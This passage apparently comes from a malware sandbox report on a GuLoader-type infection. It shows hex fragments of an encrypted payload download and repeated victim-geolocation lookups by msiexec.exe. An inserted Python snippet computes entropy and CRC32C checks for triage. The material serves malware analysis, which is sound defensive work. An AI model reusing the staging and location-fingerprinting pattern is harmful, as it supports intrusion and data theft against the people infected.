2024-12-16 17:28:49 UTC | 4947 | IN | Data Raw: af e1 74 84 d1 42 a2 05 81 24 59 55 c2 3c 16 3f bb 6b d9 4d 81 ea c3 52 12 39 bc 17 05 a1 c1 38 59 6f 54 32 19 77 4f bc 78 0e fe d5 d2 bb e0 ec ee 2f cf 0d cf b2 29 16 52 b7 dc 2b 81 4c 0d 5c b1 c1 fa c0 3c 3f 32 e1 e9 40 7d 7e 35 96 43 62 1e 79 ad 5f 56 3f 65 94 de fa 0a b7 98 cf ac 8b df 0e a1 ba 61 d2 33 3c 3a 66 03 4d 41 99 9d 3d 10 33 c2 b4 df c6 a6 21 c2 3e 8a 66 a7 8e b2 bf c8 c4 82 b3 4b b6 c1 6d b1 3a d7 ff a2 a8 3c 74 d4 4f 8c 6f 50 31 43 87 28 95 ac f7 a2 56 3b 97 8e db 8b 20 93 a5 8b 5a 3d fb 56 5f 5e 40 5e 99 75 e9 5a 3c 3c 92 70 c6 98 5f 71 5d 2d 47 43 49 51 7a 19 a7 65 44 0f 2e 0b f6 27 e1 c8 2a 63 47 ff 74 c9 31 3a 32 d5 d2 10 e3 ba 16 26 94 de 04 75 a1 64 cc 72 3e 6e 73 d9 8f fc ef 70 5c 6c be f8 cb 85 cf 39 97 0a 21 2e 25 41 da 63 b2 f8
    Data Ascii: tB$YU<?kMR98YoT2wOx/)R+L\<?2@}~5Cby_V?ea3<:fMA=3!>fKm:<tOoP1C(V; Z=V_^@^uZ<<p_q]-GCIQzeD.'*cGt1:2&udr>nsp\l9!.%Ac
2024-12-16 17:28:49 UTC | 4800 | IN | Data Raw: 70 a1 89 3c c1 09 95 3e 2e 02 13 2c e4 07 d3 41 8c b0 84 08 24 fe 68 cb f7 18 4a 02 bc a2 7e a6 02 ad 92 0a 11 06 eb 45 a8 e8 f4 c8 9a a7 ab 50 54 b7 db eb eb c3 d2 0b 73 62 68 60 e1 de 7c 88 07 12 75 05 5c e4 c1 0f 27 b4 38 8a 0a da e7 23 69 c6 b8 93 d6 31 1b 03 7e 8e 54 11 c9 58 36 35 01 89 99 b5 1d 25 46 2f e5 03 98 9b 6a ca 3f 38 2d f1 60 1f 7d 7e cb 06 26 62 a6 73 ad 58 51 50 03 94 9e f0 0d d8 ff cf ac 81 b0 66 a1 ba 6b de 33 4f 53 66 03 47 52 9d 9d 2c 14 3b d5 c7 b5 c6 a6 2b d1 3b 8a 77 22 fd d9 bf c6 d1 2b bb 5a 04 ca cf fc 82 d6 b9 6f 57 66 1c ac 3a 80 17 33 58 4b f4 49 f8 86 94 1f 29 51 97 97 fb e9 4f be 09 f0 34 0c 97 14 77 0b 0a 62 b8 18 86 34 59 ce 41 73 cc ad 5b 5d 55 3c 43 2c 48 01 3f 13 a7 f5 4c 24 40 d2 73 bd 8d 16 26 63 40 d3 73 ce 5e db
                                                                                                                                                                                  Data Ascii: p<>.,A$hJ~EPTsbh`|u\'8#i1~TX65%F/j?8-`}~&bsXQPfk3OSfGR,;+;w"+ZoWf:3XKI)QO4wb4YAs[]U<C,H?L$@s&c@s^
                                                                                                                                                                                  2024-12-16 17:28:49 UTC1327INData Raw: af af 17 83 43 ee 5f af 74 b9 dd cb 14 bf 77 3d c9 d6 b8 24 c2 8b f9 3d 3c b3 c1 cb 08 21 ff df ae fe 5c f6 69 30 84 7a 24 0a e2 34 8b 33 29 9d 0d 62 a6 93 09 2e 9a df a1 b1 85 8f 57 34 5f d1 06 26 13 a6 cc 38 24 25 c1 48 f7 e4 e6 37 11 2e 62 64 cf 10 3e 2f eb ff 46 5c 42 32 e0 e0 4d 26 95 7a 73 1c 11 d9 9f d2 c9 f3 f3 df 03 ae ac b9 57 b6 ff 6e de 80 68 bf 5e a6 7e eb 93 88 78 da 1c 68 76 43 7f 76 4d a6 b8 7e cd fd 0b 88 4f d7 56 ab 16 f4 c9 5a 07 63 2f 06 26 a7 9d 97 49 a5 a8 8b ca 04 7c 74 94 39 bf e3 99 57 1c bb 71 10 29 e6 a8 c9 db 6b 56 61 53 9e d5 67 92 fd e3 89 3c c0 76 83 4c 63 3a 12 5c 46 b3 c5 69 38 be 84 02 86 db 70 b9 90 15 4a 72 1e 2a 66 d8 3a b6 92 0e b3 eb f0 37 23 e9 f4 b8 38 82 b0 2e 7e b7 db ef 49 e7 ce 79 ea ba 69 10 43 2e 08 88 07 08
                                                                                                                                                                                  Data Ascii: C_tw=$=<!\i0z$43)b.W4_&8$%H7.bd>/F\B2M&zsWnh^~xhvCvM~OVZc/&I|t9Wq)kVaSg<vLc:\Fi8pJr*f:7#8.~IyiC.
                                                                                                                                                                                  2024-12-16 17:28:49 UTC1390INData Raw: 91 8f fc e7 e9 ce 3a e5 54 99 da 16 b6 a3 69 fe 18 d5 d2 43 f5 35 04 bf 35 0a ee 8a 29 1c fe 91 c6 b5 ce dd b2 25 8a fc 3d 51 a6 2b 9a c3 5d a1 76 1e fb 55 69 19 dc a6 19 e3 9e 1a f0 dd e0 a5 7a 94 f8 2b c1 09 c5 c3 13 d3 0c 3b 58 d3 ff 67 30 85 f5 8b f6 59 85 72 b1 0e 5b cf 7f b8 5c 83 9b 83 11 ce eb a1 54 aa 50 c7 92 ec 2d 25 e7 68 15 0b 0e 9e 46 b3 bf 1a 40 73 00 a9 be e5 07 83 98 0f 81 02 1f 92 bb 65 5f a0 4b 80 33 3c d5 02 6b 46 8f 2e db 95 4d ba 2c 5e b5 22 ba b3 d0 0b 6c a0 c6 f6 28 40 44 82 1e 80 23 bf a3 21 cb 11 6e de cc 32 19 94 24 4a b9 c0 c7 df 4a 5c 52 83 ef 1e 2e ae 4d 8b bf 70 c9 be 13 89 d1 32 a4 67 d9 9c 93 cb 71 7f 51 1c 06 a4 dc cb 18 6e 92 d0 b0 5d 78 ef 17 4d 52 a6 d1 f2 68 c9 14 59 66 c3 c0 5a 61 be c2 02 22 70 41 63 f1 06 1b 27 71
                                                                                                                                                                                  Data Ascii: :TiC55)%=Q+]vUiz+;Xg0Yr[\TP-%hF@se_K3<kF.M,^"l(@D#!n2$JJ\R.Mp2gqQn]xMRhYfZa"pAc'q
                                                                                                                                                                                  2024-12-16 17:28:49 UTC1390INData Raw: 11 09 3d 82 58 cd b7 94 89 6c 3e 78 42 ad 3e 59 50 73 fc 74 7c ef 6c ab 4e 9f c0 e5 68 35 05 00 ee 63 ff d1 10 38 30 9a 24 b7 1e 42 d7 d3 0b 76 06 ad 0d fc 4a f3 7b b1 07 76 50 08 35 87 85 28 ea 0d 46 89 e7 39 e9 56 4f c3 51 c0 1e 83 4f df 74 75 15 05 47 56 25 ba 9a b5 a0 28 c5 d0 7c d2 89 ae 14 df 42 de 9d e2 1a 61 66 e0 18 e6 85 64 7d 30 b6 04 22 87 b0 90 cb a9 7b d4 4e 42 c5 a3 a5 c0 76 8b 57 2d d9 a9 00 67 b1 2b f2 34 37 02 07 60 5e dd c9 dd c3 6d 34 73 ee 3b f4 3a 55 97 8f 50 36 a4 f8 12 3e 64 e2 fe 3a 3d 82 ad 00 aa 44 45 07 70 08 e6 7f 60 a1 0a 6a 42 38 6a e6 10 98 68 dc c5 ee 90 35 b8 fa 55 2e ca 23 26 85 f5 16 d9 2d d7 25 2d dd 27 31 22 cd 10 b9 c0 b7 07 b4 11 42 67 29 3c de fa 21 98 41 b4 8d 3c f5 72 1e 87 21 38 3a 2b 10 32 75 e1 4f 13 6d 3e 56
                                                                                                                                                                                  Data Ascii: =Xl>xB>YPst|lNh5c80$BvJ{vP5(F9VOQOtuGV%(|Bafd}0"{NBvW-g+47`^m4s;:UP6>d:=DEp`jB8jh5U.#&-%-'1"Bg)<!A<r!8:+2uOm>V
                                                                                                                                                                                  2024-12-16 17:28:49 UTC1390INData Raw: 40 a6 88 53 ff b8 00 55 42 51 52 ca ba 07 57 ac 6c 8a aa b5 df e6 c5 49 7e fd 54 9f ea f6 f8 60 2a 7e 0f 1e 4d b7 63 32 dd f5 3d a0 3d 33 10 de 38 ac b3 ed 41 c2 5f 14 d0 56 82 88 83 b9 f0 84 76 e5 35 13 6b c4 03 12 22 f4 93 f8 3f b1 5d 15 d5 dd 61 e9 eb 54 06 8e 9c 25 ff be f2 5f 06 5f cb 1d 1c d6 fc 7f e7 25 8a db 08 a1 58 f7 dc c1 a6 53 cd 65 34 8f e0 eb 03 c8 71 a1 fe 45 af d3 ec 73 48 25 64 ea 66 fa a4 56 a9 cc 47 67 61 43 cd 10 86 d7 48 73 6c 83 24 65 84 60 d9 e3 7c 25 54 ab 35 41 59 4d 9b 6d b3 d5 4f 1d 49 b5 0a 06 9a 48 e0 f7 01 e6 1e c4 22 79 42 5b 9e b7 ed 28 61 99 bf a0 40 6b 80 56 e4 e7 f3 d2 d6 c6 b6 97 fd cf 52 86 d2 d4 c3 9f f1 bd 46 27 2a 8a 62 3e 08 79 2f 3d f4 48 f7 e6 1e 40 0a 1f dd 8b ee b6 63 20 3c f0 d9 ad 93 82 fd 96 93 d9 49 5f 25
                                                                                                                                                                                  Data Ascii: @SUBQRWlI~T`*~Mc2==38A_Vv5k"?]aT%__%XSe4qEsH%dfVGgaCHsl$e`|%T5AYMmOIH"yB[(a@kVRF'*b>y/=H@c <I_%
                                                                                                                                                                                  2024-12-16 17:28:49 UTC1390INData Raw: ec 09 e7 41 99 27 80 19 75 2d d2 3e 13 dd cf 52 54 c5 97 2d 6a be 81 7d 5c df a9 8b c0 f4 66 e8 a9 ed fa 1d 60 03 df 18 8f 7a 27 54 25 ff a1 82 09 cc fb 76 55 3b 52 5a b9 b2 0c 64 06 9c d7 ed 2f 0e 9a df 70 9f 36 0c 98 3b 41 ce 9c 41 62 60 ef 76 43 31 ab 35 9b a4 23 f0 b1 fd ab 8e 0a 88 79 d0 75 71 ca d4 4c 59 ff 39 33 68 28 dc d4 a9 58 fd 28 dd 84 85 07 11 d8 e3 97 b9 b5 f0 a0 a6 54 21 47 e8 1a dd 3e 5e 4d dd 8d 57 6b 53 6e 58 09 ea 6a be 1d fc 0a 96 ba 99 a8 0f 62 8e f4 94 c0 91 58 47 df 8f 34 7c 83 1d 83 f5 5a a9 ee 24 f0 20 64 25 5c de 8d b6 82 bc 7d e9 98 d4 fe f8 ec c1 2d ee f9 00 81 38 77 f3 12 9a c5 c4 1a 42 11 89 19 42 d9 c2 40 81 ce 80 e9 54 5d d4 eb 8b bf 8f f1 af f7 8b ba 43 f9 e8 44 9e 60 3b 55 de 91 3a e3 36 b8 a2 a8 af 0f d0 b4 7c de c5 da
                                                                                                                                                                                  Data Ascii: A'u->RT-j}\f`z'T%vU;RZd/p6;AAb`vC15#yuqLY93h(X(T!G>^MWkSnXjbXG4|Z$ d%\}-8wBB@T]CD`;U:6|
                                                                                                                                                                                  2024-12-16 17:28:49 UTC1390INData Raw: a6 59 5c a1 d3 65 82 ad 8c 0b 73 bf 69 69 8e ac 7d 88 0d 02 ab 09 5c a8 ed 08 2f c0 09 89 0a 61 e7 ff b7 c6 9d bb f3 31 1b 21 0e 8a 54 33 a0 5f 1e 65 dc ea 95 b6 72 79 46 2f 91 5e fc 9b 6e b2 aa 3d 32 91 fb 68 fc 7e ca 63 55 9c a7 6a a8 4e 53 06 af 96 9e fa 74 98 98 cf a8 f9 ac 1e a1 ca 77 fa b2 3c 3a 6c 15 b3 40 8a 9b 2c 16 0a f2 b5 df c6 a6 35 3c 38 b7 66 27 88 c1 7f c6 db 32 95 8a 02 c8 aa 90 f1 14 b3 6f 83 7b 1b ac 3b d2 25 22 5e 20 86 8a f8 8c 9e ac fc 55 f8 f0 fb f8 42 dc 12 fe 34 17 ec 05 7f 1a 0b 62 7f 18 86 34 59 03 98 0f 55 ac 5f 01 75 99 47 43 43 73 90 09 a7 59 6d 57 2e d2 79 d8 40 c8 2a 69 47 ee 73 d4 bc 9a 32 d7 d2 3e f4 98 2d 30 b0 aa a6 50 a2 4c 78 72 3e 64 d1 c2 d4 8a 88 7f 7c 1c 1c dd b2 ff f7 39 97 4e 83 0b 1f 33 eb 60 b0 88 a4 4c ad df
                                                                                                                                                                                  Data Ascii: Y\esii}\/a1!T3_eryF/^n=2h~cUjNStw<:l@,5<8f'2o{;%"^ UB4b4YU_uGCCsYmW.y@*iGs2>-0PLxr>d|9N3`L
                                                                                                                                                                                  2024-12-16 17:28:49 UTC1390INData Raw: d1 4f 3a 1d 6a 16 9f 84 f8 f7 ce 57 fd 0e 5f 89 89 4b f6 ea fb dd a8 d0 05 dc 3b 1e 4c c2 7b 05 20 3e 89 7f 8c 7d 67 a1 67 30 6f b7 57 be 7a b9 80 cb 14 bf 64 c3 0c 48 dd 0c f6 8a dc 21 5d ef d6 e3 1a 83 da c2 5b 14 5a f6 63 92 a1 62 28 5f ed 34 ff e3 99 86 73 2a b0 bb 8c 8c bf cf c5 7e 87 9c 21 87 71 9d c5 24 19 b5 91 01 0c 53 c5 3a 8e f4 c6 47 0b 06 e3 4c b8 1a 28 db ea ec 3f 72 45 0b d4 f0 6f 54 ec 79 8d 6a 52 c6 9f d4 be 1b ba df 09 8c 7c 9a 29 fc ff 1d 18 a8 56 b5 4d a8 6f 3d fd 97 50 ee 18 1b bf 50 5b 7c 0a 00 b8 7e cd 23 1a 80 20 12 28 9c 1c 8a f0 28 92 65 40 b0 30 8f 16 97 58 a7 cc ec db 17 29 4d 05 15 e3 f4 66 b8 0c bb 00 1d 64 94 93 d5 b4 dc f4 44 4e b6 70 6f 8f 7a 01 ac 24 b3 34 9a 3e 5e 97 37 35 9a ae d2 41 88 1c a1 12 56 cf 6b cb 87 b8 6f 19
                                                                                                                                                                                  Data Ascii: O:jW_K;L{ >}gg0oWzdH!][Zcb(_4s*~!q$S:GL(?rEoTyjR|)VMo=PP[|~# ((e@0X)MfdDNpoz$4>^75AVko
                                                                                                                                                                                  2024-12-16 17:28:49 UTC1390INData Raw: 1c 9c cd 35 0d f0 02 e3 a2 e2 1b 27 27 80 2e 0e 61 55 4c 95 c9 3b fd 52 14 97 7c 7b 35 d4 15 2d ee 83 5b ff dd 9a 07 5f a4 8d 01 d0 18 d7 0e fc cf 7e a8 57 d3 9e d4 66 ce f5 8b f8 1e 12 72 b1 0e 27 22 64 35 16 83 8a 93 4a e2 99 52 42 d4 1b 65 b7 ff 76 2d e7 68 15 c6 e6 86 34 de b0 0b 21 c0 29 df 0e dd 07 89 9c bc a8 77 a2 a3 b8 6f 2f dc 73 d0 1b 08 df 11 43 43 b4 58 f3 f7 47 ba 06 80 b9 22 ba 9b a7 0b 12 9f c6 f6 52 0d d1 80 1a e1 14 e5 03 32 cb 6b 06 3f cd 21 09 ad 79 73 42 cb d6 fd 29 91 12 83 eb 37 35 b8 3f b6 a9 ae a9 39 1e aa f9 86 ae 74 f0 3e 9e b1 03 18 54 c2 76 06 f9 d2 18 61 92 d0 b0 8d c8 f7 65 0c 47 8e 20 50 4d d8 7c 87 67 d0 e0 e9 60 8e ec 58 b9 30 31 c1 d8 56 0d 55 36 fa c6 92 b8 7c bb aa 23 72 54 de 4a c9 82 78 6e fd 0e 5e 7a c9 d3 6a c2 44
                                                                                                                                                                                  Data Ascii: 5''.aUL;R|{5-[_~Wfr'"d5JRBev-h4!)wo/sCCXG"R2k?!ysB)75?9t>TvaeG PM|g`X01VU6|#rTJxn^zjD
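The response above comes from a Google-hosted download (Server: UploadServer, X-Goog-Hash: crc32c=/T2+IA==, Content-Length: 277056) and the Data Raw rows show a body that neither starts with an MZ header nor contains any readable structure, which is what a loader fetching an encrypted stage looks like. The following Python is an added example, not code from the Joe Sandbox report or from the malware: it decodes a Data Raw row, measures its byte entropy, and shows how to check a fully downloaded body against the CRC32C the server advertises in X-Goog-Hash (base64 of the big-endian CRC). The 255-byte sample is the first Data Raw row of the response above copied verbatim; the entropy threshold and the small body used to exercise the hash check are assumptions.

```python
import base64
import math
from collections import Counter
from typing import Dict

# First "Data Raw" row of the UploadServer response above, copied verbatim from
# this report (the sandbox prints only the leading bytes of each received chunk).
DATA_RAW_ROW = (
    "Data Raw: "
    "af e1 74 84 d1 42 a2 05 81 24 59 55 c2 3c 16 3f bb 6b d9 4d 81 ea c3 52 12 39 bc 17 05 a1 c1 38 "
    "59 6f 54 32 19 77 4f bc 78 0e fe d5 d2 bb e0 ec ee 2f cf 0d cf b2 29 16 52 b7 dc 2b 81 4c 0d 5c "
    "b1 c1 fa c0 3c 3f 32 e1 e9 40 7d 7e 35 96 43 62 1e 79 ad 5f 56 3f 65 94 de fa 0a b7 98 cf ac 8b "
    "df 0e a1 ba 61 d2 33 3c 3a 66 03 4d 41 99 9d 3d 10 33 c2 b4 df c6 a6 21 c2 3e 8a 66 a7 8e b2 bf "
    "c8 c4 82 b3 4b b6 c1 6d b1 3a d7 ff a2 a8 3c 74 d4 4f 8c 6f 50 31 43 87 28 95 ac f7 a2 56 3b 97 "
    "8e db 8b 20 93 a5 8b 5a 3d fb 56 5f 5e 40 5e 99 75 e9 5a 3c 3c 92 70 c6 98 5f 71 5d 2d 47 43 49 "
    "51 7a 19 a7 65 44 0f 2e 0b f6 27 e1 c8 2a 63 47 ff 74 c9 31 3a 32 d5 d2 10 e3 ba 16 26 94 de 04 "
    "75 a1 64 cc 72 3e 6e 73 d9 8f fc ef 70 5c 6c be f8 cb 85 cf 39 97 0a 21 2e 25 41 da 63 b2 f8"
)
# Header and length exactly as served in the response above.
X_GOOG_HASH = "crc32c=/T2+IA=="
CONTENT_LENGTH = 277056


def decode_data_raw(row: str) -> bytes:
    """Turn a sandbox 'Data Raw:' hex row into bytes (whitespace is ignored)."""
    return bytes.fromhex(row.split("Data Raw:", 1)[-1])


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant run, 8.0 for a uniform spread."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage_chunk(chunk: bytes, threshold: float = 6.5) -> Dict[str, object]:
    """Quick look at a downloaded chunk. The threshold is a rule of thumb
    (assumption): a plaintext PE header scores far below it, packed or
    encrypted data scores well above it."""
    ent = shannon_entropy(chunk)
    return {"starts_with_mz": chunk[:2] == b"MZ",
            "entropy": round(ent, 3),
            "looks_encrypted": ent >= threshold}


def crc32c(data: bytes, crc: int = 0) -> int:
    """CRC-32C (Castagnoli, reflected polynomial 0x82F63B78), the checksum Google
    puts in X-Goog-Hash. Bitwise and table-free; pass a previous result as `crc`
    to continue over the next chunk."""
    crc ^= 0xFFFFFFFF
    for b in data:
        crc ^= b
        for _ in range(8):
            crc = (crc >> 1) ^ (0x82F63B78 if crc & 1 else 0)
    return crc ^ 0xFFFFFFFF


def parse_goog_crc32c(header_value: str) -> int:
    """X-Goog-Hash is a comma list such as 'crc32c=<b64>' or 'crc32c=<b64>, md5=<b64>';
    the four decoded crc32c bytes are the checksum in big-endian order."""
    for part in header_value.split(","):
        name, _, b64 = part.strip().partition("=")
        if name == "crc32c":
            return int.from_bytes(base64.b64decode(b64), "big")
    raise ValueError("no crc32c entry in X-Goog-Hash")


def encode_goog_crc32c(crc: int) -> str:
    """Inverse of parse_goog_crc32c; used to build a header for a known body."""
    return "crc32c=" + base64.b64encode(crc.to_bytes(4, "big")).decode()


def verify_download(body: bytes, content_length: int, x_goog_hash: str) -> Dict[str, object]:
    """Check a fully captured body against the length and CRC32C the server
    advertised. A mismatch means a truncated or altered capture, so run this
    before spending time on unpacking."""
    return {"length_ok": len(body) == content_length,
            "crc32c_ok": crc32c(body) == parse_goog_crc32c(x_goog_hash),
            "entropy": round(shannon_entropy(body), 3)}


if __name__ == "__main__":
    chunk = decode_data_raw(DATA_RAW_ROW)
    print(len(chunk), "bytes:", triage_chunk(chunk))
    print("advertised crc32c: 0x%08x" % parse_goog_crc32c(X_GOOG_HASH))
    # Only the leading bytes of the 277056-byte body are visible in the report,
    # so the full check cannot run on the page's data; with the saved body it is:
    #   verify_download(open("payload.bin", "rb").read(), CONTENT_LENGTH, X_GOOG_HASH)
```

If the sandbox's PCAP is available, run verify_download over the reassembled body first: a wrong CRC usually means the capture was cut short, and unpacking a truncated GuLoader stage wastes time. The entropy check is only a hint; XOR-obfuscated data also scores high, so it tells you the stage needs decoding, not how.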


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 104.21.67.152 | 443 | 8012 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 17:28:54 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-12-16 17:28:54 UTC | 878 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 17:28:54 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 358903
    Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YpwgdYAO8IaOjhIGeIeO44gMU1h0p1G8hcPsyTjHYLRKaE3%2FfO9LPp0N83dH57jBPnqN%2BqQ3cnU3OUpvA9BiIRg0nznkbfixA%2FWB1v2tKpb8ssOv00HD9QAszrdoEGw%2F6ebQrdWe"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f30647daf9b199d-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1818&rtt_var=688&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1606160&cwnd=223&unsent_bytes=0&cid=d33c80c8f18048f4&ts=469&x=0"
2024-12-16 17:28:54 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49740 | 104.21.67.152 | 443 | 8012 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 17:28:56 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2024-12-16 17:28:56 UTC | 886 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 17:28:56 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 358905
    Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vedteoUKHuSwjG3%2F2ZPg09pvFKHW%2B2S%2BIU0TmkWHNtR5%2B%2B77YrYIxZpgjOb%2BoATkhRob2G9LDx6KM8aXtDKrN7X2BtcM7pucpXJ8IVCnPQQBZ1PBhUGgFUu%2F%2F2pghYKueKm5WvT4"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f30648acbc5728a-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1846&min_rtt=1840&rtt_var=694&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1586956&cwnd=227&unsent_bytes=0&cid=78d043de7cf9934a&ts=510&x=0"
2024-12-16 17:28:56 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49744 | 104.21.67.152 | 443 | 8012 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 17:28:59 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-12-16 17:29:00 UTC | 880 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 17:28:59 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 358908
    Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=12grzhg%2BPAuA96hOnCByMNLOpBG%2F2%2FAdFlKUi02xrvp1IZx62guETNkkHlEj%2BjqNYeUlvMXMhZu2Xo1kFqmaOLAyhDYJFDJnge4%2FXOLNx4ZmUcf5N3J8PwEqrQXfI5KVMWSn0BYq"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f30649e3a821879-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1681&rtt_var=650&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1658148&cwnd=162&unsent_bytes=0&cid=a09f3ae604f6d0d2&ts=459&x=0"
2024-12-16 17:29:00 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49756 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 8012 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
